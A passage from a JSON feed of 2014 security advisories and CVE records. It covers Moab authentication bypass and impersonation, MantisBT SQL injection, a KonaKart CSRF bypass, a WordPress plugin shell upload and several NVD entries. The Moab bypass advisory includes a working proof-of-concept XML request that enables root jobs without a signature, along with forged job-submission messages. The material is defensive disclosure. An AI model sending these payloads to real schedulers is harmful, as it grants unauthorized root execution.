<Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\START/usr/bin/id\0a\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nWithin this message users are specified in multiple locations, these are highlighted in bold in the message above. In versions of moab prior to Moab 8 there are two instances of the "actor" value specified. In order for mauth to sign a message the actor specified within the <Request> tag must match the user calling mauth. It is not necessary for the actor value within the <Body> tag to match the calling user.\r\nIn addition to checks at the mauth level the server will perform its own checks. The server ensures that the <Owner> matches the user specified within the <Body> actor value. If either differs an error (code 999 – invalid credentials specified for submitted job) is returned by the server and the job rejected.\r\n\r\nSince the actor value within the body tag is not verified by mauth, and this actor value is also the one against which the server checks the <Owner> tag, it is possible to smuggle through jobs to the server with an arbitrary user specified in each of these values. The user under which the job is queued by Moab is the user specified within the <UserId> tag. Whilst it is possible to impersonate a user by changing only this value, doing so appears to impede communication between Moab and a workload manager, on TORQUE this results in the job entering a BatchHold state where it will not execute. When the Body.actor value, the <Owner> and the <UserId> value are altered (but the Request.actor value remains legitimate to facilitate signing) it is possible to impersonate any user.\r\n\r\nThe example above describes this process when impersonating users during job submission. Moab also provides a means to reconfigure the server and a similar approach can be adopted to impersonate root and perform server reconfiguration.\r\nIn Moab 8 only a single actor value is contained within the messages and is used by both mauth and by the Moab server. This prevents manipulation of the <Owner> value during job submission. It remains possible to alter the <UserId> value and submit jobs in Moab 8 (as described above), although in a typical Moab+TORQUE configuration this does cause the job to enter a BatchHold state (other resource managers have not been tested).\r\n\r\nWhilst components of this issue remain outstanding, upgrading to 7.2.9 or Moab 8 appears to mitigate direct exploitation of the issue. \r\n\r\n\r\n##[Detailed Timeline]\r\n\r\n2014-01-21 : Detailed vulnerability information provided to Adaptive \r\n2014-09-01 : Full advisory provided to Adaptive\r\n2014-09-08 : Release of advisory to HPC community\r\n2014-09-25 : Public release of advisory\t\r\n\r\n\r\nhttp://labs.mwrinfosecurity.com \r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "Moab User Impersonation [CVE-2014-5375]", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-5375"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31195", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31195", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n##[Moab Authentication Bypass : CVE-2014-5300]##\r\n\r\nSoftware: Moab\r\nAffected Versions: All versions prior to Moab 7.2.9 and Moab 8\r\nCVE Reference: CVE-2014-5300\r\nAuthor: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Resolved in Moab 7.2.9 and Moab 8\r\n\r\n\r\n##[Description]\r\n\r\nIt is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.\r\n\r\n\r\n##[Impact]\r\n\r\nSuccessful exploitation could lead to remote code execution.\r\n\r\n\r\n##[Cause]\r\n\r\nThe Moab server does not appropriately authenticate requests.\r\n\r\n\r\n##[Solution]\r\n\r\nUpgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.\r\n\r\nThis issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.\r\n\r\n\r\n##[Technical Details]\r\n\r\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below: \r\n\r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Signature>\r\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\r\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\r\n </Signature>\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\START/usr/bin/id\0a\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nContained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.\r\n\r\nHowever, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element.\r\n\r\nThe following message contains no signature element and therefore will be accepted by the server:\r\n\r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\START/usr/bin/id\0a\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nWith no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.\r\n\r\n\r\n##[Proof of Concept]\r\n\r\nIn addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering): \r\n\r\n00000238\r\n<Envelope component="ClusterScheduler" count="1" name="moab" version="8.0.beta.2"><Body actor="root" timestamp="1404856164"><Request action="modify" actor="root" args="ALLOWROOTJOBS TRUE"><Object>sched</Object></Request></Body></Envelope>\r\n\r\nSending the entire message above (including the size value) will enable root jobs on a vulnerable server.\r\n\r\n\r\n##[Detailed Timeline]\r\n\r\n2014-07-08 : Vulnerability identified and detailed information passed to Adaptive\r\n2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue\r\n2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue\t\r\n2014-07-14 : Moab 8 released\r\n2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge\r\n2014-09-08 : Release of advisory to HPC community\r\n2014-09-16 : Moab 7.2.9 released\r\n2014-09-25 : Public release of advisory\t\r\n\r\n\r\nhttp://labs.mwrinfosecurity.com\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "Moab Authentication Bypass [CVE-2014-5300]", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-5300"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31196", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31196", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3030-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nSeptember 20, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mantis\r\nCVE ID : CVE-2014-1608 CVE-2014-1609\r\n\r\nMultiple SQL injection vulnerabilities have been discovered in the Mantis\r\nbug tracking system.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1.2.11-1.2+deb7u1.\r\n\r\nWe recommend that you upgrade your mantis packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJUHfCtAAoJEBDCk7bDfE42hG4QAIC7xRXp8yhXEsCAquJrlZDe\r\nIytqw1cll+sfCCZVR4OojdvV9TzenjKyLeYof9XwcAS2odnYFjm9ZvKp+oDNMFfX\r\ndhVAaztU9UJDdGkG6VFBPfkC6gggL2ljQWzHDMF7bc+eKHDV+tys6/7Rhb4OHRKI\r\niT7YK+9ghGzrCKfbJpWUbaefchv39P4S2L195flF8zDSDA4y6jhrt/Tob+H4aKUK\r\nXVLfsI+wKlizBsAK6Ycq8oXbOBs5coiLSSTPoy7Cs0JygBFhqwlY0PbKH5TNcipT\r\nF6nBDHWGfCmjCIOGeL+YbKHKTcCCiS2mFshlfNcO+0HXkYILT6OqctRqjWWL8Ow/\r\n4seEWdCMgVD9JFLbUHaVTnZKSlbKmSeKtTVrB34nJJIt/m484KivXGRPBKtZMPCU\r\njQSeALvdFEf/icwGtncmnruu181E8C2XSm1nx8f5V/11aBdTNZ/NSPz+rSRvOyea\r\nvPOdPtEvL3UNnLcaj4EPMr4KPCOn4WsfW4BKHOda+hLSOsz0/vu+ZU1mFMSdhOk6\r\nbzSPgwNIQmYSlbJsJQQSQNok7w+peIiVKh5FAqFea98gUOPAU+a3hd3LmOmxoqBa\r\nQIFY0uBIssXJbVXKZbnN5ytU9sJoZOL6YXVONUxqS2KfAHUZ4lmpyvBLlG4PxHoT\r\nZeYs5kq49357vZ/Ksnoq\r\n=GhoP\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "[SECURITY] [DSA 3030-1] mantis security update", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31210", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31210", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "references": [], "description": "\r\n\r\n\r\n#2014-001 MantisBT input sanitization errors\r\n\r\nDescription:\r\n\r\nThe MantisBT web-based bugtracking system suffers from SQL injection\r\nvulnerabilities caused by insufficient input sanitization.\r\n\r\nThe MantisBT SOAP API uses the unsafe db_query() function allowing a\r\nspecially crafted tag within the envelope of a mc_issue_attachment_get SOAP\r\nrequest to inject arbitrary SQL queries.\r\n\r\nThe reporting of this specific issue was followed by an investigation that\r\nlead to additional cases of unsafe db_query() function use, being found by\r\nMantisBT maintainers, throughout MantisBT code.\r\n\r\nAffected version:\r\n\r\nMantisBT >= 1.1.0a4, <= 1.2.15\r\n\r\nFixed version:\r\n\r\nMantisBT >= 1.2.16\r\n\r\nCredit: vulnerability report received from Martin Herfurt <martin.herfurt AT\r\nnruns.com>.\r\n\r\nCVE: CVE-2014-1608 (SOAP), CVE-2014-1609 (additional SQL injections)\r\n\r\nTimeline:\r\n\r\n2014-01-17: vulnerability report received\r\n2014-01-17: contacted MantisBT maintainer\r\n2014-01-17: maintainer provides patch for review\r\n2014-01-18: contacted affected vendors\r\n2014-01-19: assigned CVEs\r\n2014-02-08: MantisBT 1.2.16 released\r\n2014-02-08: advisory release\r\n\r\nReferences:\r\nhttp://www.mantisbt.org\r\nhttp://www.mantisbt.org/bugs/view.php?id=16879\r\nhttp://www.mantisbt.org/bugs/view.php?id=16880\r\nhttp://github.com/mantisbt/mantisbt/commit/00b4c17088fa56594d85fe46b6c6057bb3421102\r\nhttp://github.com/mantisbt/mantisbt/commit/7efe0175f0853e18ebfacedfd2374c4179028b3f\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2014-001.html\r\n\r\n-- Andrea Barisani | Founder & Project Coordinator oCERT | OSS Computer Security Incident Response Team <lcars@ocert.org> http://www.ocert.org 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E "Pluralitas non est ponenda sine necessitate"\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-02-11T00:00:00", "title": "[oCERT-2014-001] MantisBT input sanitization errors", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:50", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-02-11T00:00:00", "id": "SECURITYVULNS:DOC:30305", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30305", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n##[Moab Authentication Bypass (insecure message signing) : CVE-2014-5376]##\r\n\r\nSoftware: Moab\r\nAffected Versions: Dependent on configuration, can affect all versions of Moab including Moab 8\r\nCVE Reference: CVE-2014-5376\r\nAuthor: John Fitzpatrick, Luke Jennings MWR Labs (http://labs.mwrinfosecurity.com/)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Provided additional guidance in 7.2.9 release notes (MOAB-7480) \r\n\r\n\r\n##[Description]\r\nMoab provides two methods to authenticate messages sent by users (e.g. job submissions). The default scheme which is widely used is insecure and can be circumvented in order to impersonate other users and perform operations on their behalf.\r\n\r\n\r\n##[Impact]\r\n\r\nIt is possible to exploit this issue remotely in order to perform any operation on the server from the perspective of any user role. Examples include submitting jobs as arbitrary users (including as root), as well as reconfiguring the Moab server itself.\r\n\r\n\r\n##[Cause]\r\n\r\nThe default authentication mechanism does not perform sufficient validation that the user requesting the signing of a message is the owner of the message.\r\n\r\n\r\n##[Solution]\r\n\r\nMake use of moab.key files with a complex key value.\r\n\r\nAdaptive acknowledge this issue in the 7.2.9 release notes (MOAB-7480) as a known issue, stating:\r\n\r\n"When installing or upgrading, it is strongly recommended that administrators configure Moab with mauth authentication with a complex key value. See Mauth Authentication (http://docs.adaptivecomputing.com/mwm/7-2-9/help.htm#a.esecurity.html%23mauth) for more information."\r\n\r\n\r\n##[Technical Details]\r\n\r\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. Moab communication makes use of an XML based protocol and these messages are signed with a key. An example message is shown below:\r\n\r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Signature>\r\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\r\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\r\n </Signature>\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\START/usr/bin/id\0a\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nOn receiving a message the server will generate a signature and ensure that it matches the <SignatureValue> element within the message. This signature is effectively computed in the following manner:\r\n\r\nsignature = f(messageBody,key)\r\n\r\nTherefore in order to communicate with the Moab server users must be able to compute valid signatures and two mechanisms are provided within Moab for achieving this:\r\n\r\n1. The use of .moab.key files (more secure)\r\n2. Use of a pre-generated key (insecure) - default\r\n\r\nWhere .moab.key files are used a SUID root binary (mauth) provides an interface to this key as well as a means for verifying that the user calling mauth matches the actor specified within the XML message being signed.\r\n\r\nWhere a pre-generated key is used mauth is not called and the generation of messages is performed entirely within the context of the calling user. There is no validation that the user requesting the signing of the message is the actor specified within the message. As a result where pre-generated keys are used it is possible to craft messages belonging to other users and to perform operations and submit jobs as other users. Simply patching the return value of calls to getuid() is sufficient to impersonate other users. \r\n\r\n\r\n##[Detailed Timeline]\r\n\r\n2014-01-21 : Detailed vulnerability information provided to Adaptive \r\n2014-08-27 : Full advisory provided to Adaptive\r\n2014-09-08 : Release of advisory to HPC community\r\n2014-09-25 : Public release of advisory\r\n\r\nhttp://labs.mwrinfosecurity.com\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "Moab Authentication Bypass (insecure message signing) [CVE-2014-5376]", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-5376"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31194", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31194", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nCVE-2014-5516\r\n===================\r\n"Cross-Site Request Forgery (CSRF) protection bypass" (CWE-352) vulnerability \r\nin "KonaKart Storefront Application" Enterprise Java eCommerce product\r\n\r\n\r\nVendor\r\n===================\r\nDS Data Systems (UK) Ltd.\r\n\r\n\r\nProduct\r\n===================\r\n"KonaKart is an affordable java based shopping cart software solution for online retailers. \r\nLet KonaKart help increase your eCommerce sales."\r\n - source: http://www.konakart.com\r\n\r\n"KonaKart is a Java eCommerce system aimed at medium to large online retailers."\r\n - source: https://en.wikipedia.org/wiki/KonaKart\r\n\r\n\r\nAffected versions\r\n===================\r\nThis vulnerability affects versions of KonaKart Storefront Application prior to 7.3.0.0\r\n\r\n\r\nPatch\r\n===================\r\nThe vendor has released a XSRF fix as part of version 7.3.0.0 at\r\nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new\r\n\r\n\r\nReported by\r\n===================\r\nThis issue was reported to the vendor by Christian Schneider (@cschneider4711) \r\nfollowing a responsible disclosure process.\r\n\r\n\r\nSeverity\r\n===================\r\nMedium\r\n\r\n\r\nDescription\r\n===================\r\nThe existing CSRF protection token was checked for every POST request\r\nproperly. When modifying the request from POST method to GET method \r\nall state-changing actions worked as well, but the CSRF token protection \r\nwas no longer enforced, allowing CSRF attacks.\r\n\r\n\r\nEscalation potential\r\n====================\r\nExploitation demonstration was responsibly provided along with the vulnerability \r\nreport to the vendor, which changed a victim's mail address (using the CSRF \r\nprotection bypass) to an attacker-supplied mail address, allowing a successful \r\nreset of victim's account password by the attacker.\r\n\r\n\r\nTimeline\r\n===================\r\n2014-05-02 Vulnerability discovered\r\n2014-05-02 Vulnerability responsibly reported to vendor\r\n2014-05-02 Reply from vendor acknowledging report\r\n2014-??-?? Vendor released patch as part of version 7.3.0.0\r\n2014-09-20 Advisory published via BugTraq\r\n\r\n\r\nReferences\r\n===================\r\nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new\r\nhttp://www.christian-schneider.net/advisories/CVE-2014-5516.txt\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (Darwin)\r\n\r\niEYEARECAAYFAlQd69cACgkQXYAsOfddvFOTVACgr/f5+x5kf60t5LaCqhH0pvSY\r\nQYoAnjiI0WSa3iGuw/OfXk3/vLV+liFm\r\n=61mn\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "CVE-2014-5516 CSRF protection bypass in "KonaKart" Java eCommerce product", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-5516"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31211", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n> I found a serious security vulnerability in the Slideshow Gallery\r\n> plugin. This bug allows an attacker to upload any php file remotely to\r\n> the vulnerable website (administrator by default).\r\n>\r\n> I have tested and verified that having the current version of the\r\n> plugin installed in a WordPress installation will allow any registered\r\n> user (Administrator, Editor, Author, Contributor and Subscriber), to\r\n> upload a PHP shell to exploit the host system.\r\n>\r\n> Today (2014-08-29), I did the notification to vendor and they gave me\r\n> feedback about the vulnerability by email. The vendor has released a\r\n> patch a few hours ago. (SlideShow Gallery version 1.4.7 at\r\n> https://wordpress.org/plugins/slideshow-gallery/changelog).\r\n\r\n> 1.4.7\r\n> FIX: Possible shell exploit by uploading PHP file as slide\r\n\r\n> POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides&method=save\r\n> Content-Type: multipart/form-data\r\n>\r\n> WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.\r\n> @jesusrpichardo\r\n> @whitexploit\r\n> http://whitexploit.blogspot.mx/\r\n> Vendor Homepage: http://tribulant.com/\r\n> Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip\r\n\r\nUse CVE-2014-5460.\r\n\r\n- --\r\nCVE assignment team, MITRE CVE Numbering Authority\r\nM/S M300\r\n202 Burlington Road, Bedford, MA 01730 USA\r\n[ PGP key available through http://cve.mitre.org/cve/request_id.html ]\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (SunOS)\r\n\r\niQEcBAEBAgAGBQJUAUSGAAoJEKllVAevmvmsfgsH/1wdmz8/fK6/c5esD/XchVeZ\r\n+PNY6HY4w6Aq37s+QzGJilwK+/lhPIkpQbwlF1dhqTXhRY1B2M12EWjkZiewtha8\r\n0Tmm0AT/itJpt0IIGQc5xKDz3ftFqwIjvnFRTu+UPGPpnL+FA+Kfsl8gi+dFbpyS\r\nHHkccUv793w39x2s8ynnBxtzPjHKKhCmya68cB2hAzHgmfg8rV/ydgxAgi1Kb3Kc\r\n2TeK5LZ2iMPijXqBmrMd8IaGmf49FElpKBAx1tj9fPDTgepMKQxSOk5g+cnzZ/Zm\r\nk6DcZmxPmwuJUBDJdsWkVVxJsP8ofmMdH1yMiHqLLGYxtvlItfOb8FHCbhcCKAE=\r\n=Xmvx\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability (CVE-2014-5460)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-5460"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31171", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31171", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-04-21T11:17:44", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html", "http://www.securityfocus.com/bid/69370", "http://www.openwall.com/lists/oss-security/2014/08/25/1", "https://exchange.xforce.ibmcloud.com/vulnerabilities/95454", "https://bugzilla.redhat.com/show_bug.cgi?id=1133439", "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html"], "description": "Zarafa Collaboration Platform 4.1 uses world-readable permissions for /etc/zarafa/license, which allows local users to obtain sensitive information by reading license files.", "edition": 2, "reporter": "NVD", "published": "2018-03-19T17:29:00", "title": "CVE-2014-5450", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-5450"], "scanner": [], "modified": "2018-04-20T10:56:12", "cpe": ["cpe:/a:zarafa:zarafa_collaboration_platform:4.1"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5450", "id": "CVE-2014-5450", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-08T10:27:00", "references": ["https://plugins.trac.wordpress.org/changeset?new=986500", "https://exchange.xforce.ibmcloud.com/vulnerabilities/96799", "http://www.securityfocus.com/archive/1/archive/1/533595/100/0/threaded", "http://www.securityfocus.com/bid/70204", "https://www.htbridge.com/advisory/HTB23232", "http://packetstormsecurity.com/files/128518/WordPress-Photo-Gallery-1.1.30-Cross-Site-Scripting.html"], "edition": 2, "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Web-Dorado Photo Gallery plugin 1.1.30 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) callback, (2) dir, or (3) extensions parameter in an addImages action to wp-admin/admin-ajax.php.", "reporter": "NVD", "published": "2014-10-10T10:55:08", "title": "CVE-2014-6315", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-6315"], "scanner": [], "cpe": ["cpe:/a:photo_gallery_plugin_project:photo_gallery_plugin:1.1.30::~~~wordpress~~"], "modified": "2017-09-07T21:29:13", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6315", "id": "CVE-2014-6315", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T20:37:58", "references": ["http://www.securityfocus.com/bid/68205", "http://lists.opensuse.org/opensuse-updates/2014-08/msg00045.html", "https://github.com/phpmyadmin/phpmyadmin/commit/daa98d0c7ed24b529dc5df0d5905873acd0b00be", "http://phpmyadmin.net/home_page/security/PMASA-2014-3.php", "https://github.com/phpmyadmin/phpmyadmin/commit/d4f754c937f9e2c0beadff5b2e38215dde1d6a79"], "edition": 1, "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.", "reporter": "NVD", "published": "2014-06-25T07:19:22", "title": "CVE-2014-4349", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-4349"], "scanner": [], "modified": "2015-09-02T13:11:09", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4349", "id": "CVE-2014-4349", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-18T15:55:10", "references": ["http://lists.opensuse.org/opensuse-updates/2014-08/msg00045.html", "http://www.securityfocus.com/bid/68803", 